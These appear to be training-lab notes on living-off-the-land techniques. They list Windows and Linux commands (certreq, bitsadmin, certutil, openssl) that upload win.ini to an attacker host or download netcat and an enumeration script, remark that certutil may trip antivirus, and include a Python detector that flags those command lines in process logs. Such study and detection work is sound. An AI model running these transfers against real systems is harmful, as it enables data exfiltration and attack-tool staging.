Living off the Land

LOLBins (Living off the Land binaries)

  • LOLBAS Project for Windows Binaries (https://lolbas-project.github.io/)
  • GTFOBins for Linux Binaries (https://gtfobins.github.io/)

Living off the Land binaries can be used to perform functions such as:

  • Download
  • Upload
  • Command Execution
  • File Read
  • File Write
  • Bypasses


LOLBAS: https://lolbas-project.github.io/

  • Search for a function using /
  • For example, searching for /download lists the binaries that can be used for downloading files.

Certreq.exe

  • Uploading a file from the target to our pwnbox using Certreq.exe
    • Target: certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini
    • PWNBOX: sudo nc -lvnp 8000
  • If certreq.exe returns errors, download and use https://github.com/juliourena/plaintext/raw/master/hackthebox/certreq.exe

Bitsadmin

  • bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
  • Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

Certutil

  • certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe
  • Certutil might be flagged by the antivirus
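
Detection side of the Windows commands above, as an added example that is not part of the original notes: a small classifier that flags process-creation command lines matching the certreq, bitsadmin, Start-BitsTransfer and certutil transfer patterns and extracts the remote URL for triage. The rule names, the sample events and the extra -urlcache certutil verb are assumptions introduced for this example.

```python
import re

URL = r"(https?://[^\s\"']+)"
# Each rule needs the binary AND the argument shape that makes it a network
# transfer, so routine use such as `certutil -hashfile` does not match.
RULES = {
    "certreq-post-upload": rf"\bcertreq(?:\.exe)?\b.*\s-post\b.*?{URL}",
    "bitsadmin-transfer": rf"\bbitsadmin(?:\.exe)?\b.*\s/transfer\b.*?{URL}",
    "start-bitstransfer": rf"\bstart-bitstransfer\b.*\s-source\s+[\"']?{URL}",
    # Assumption: -urlcache (another certutil verb that takes a URL) is added
    # here; the notes above only use -verifyctl.
    "certutil-remote-fetch": rf"\bcertutil(?:\.exe)?\b.*\s-(?:verifyctl|urlcache)\b.*?{URL}",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}


def classify(cmdline):
    """Return (rule_name, remote_url) for the first matching rule, else None."""
    for name, rx in COMPILED.items():
        m = rx.search(cmdline)
        if m:
            return name, m.group(1)
    return None


def scan(cmdlines):
    """Return [(index, rule_name, remote_url)] for every command line that matches."""
    hits = []
    for i, line in enumerate(cmdlines):
        result = classify(line)
        if result:
            hits.append((i, *result))
    return hits


# Constructed command lines, as found in the CommandLine field of Sysmon
# Event ID 1 or Security Event 4688. The first four reuse the commands from
# the notes above; the last three are benign uses of the same binaries.
SAMPLE_EVENTS = [
    r"certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini",
    r"bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe",
    r"powershell.exe -c Import-Module bitstransfer; Start-BitsTransfer -Source 'http://10.10.10.32:8000/nc.exe' -Destination C:\Windows\Temp\nc.exe",
    r"certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe",
    r"certutil.exe -hashfile C:\Temp\setup.exe SHA256",
    r"bitsadmin /list /allusers",
    r"certreq.exe -new request.inf request.req",
]

if __name__ == "__main__":
    for idx, rule, url in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {url}")
```

Command-line matching misses renamed copies of these binaries (the notes themselves suggest swapping in a downloaded certreq.exe), so match on the image's original file name as well where the log source records it.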

GTFOBins:

  • Search for a function using +
  • e.g., +file download or +shell
  • File download using openssl
    • PWNBOX
      • openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
      • openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
    • Target
      • openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh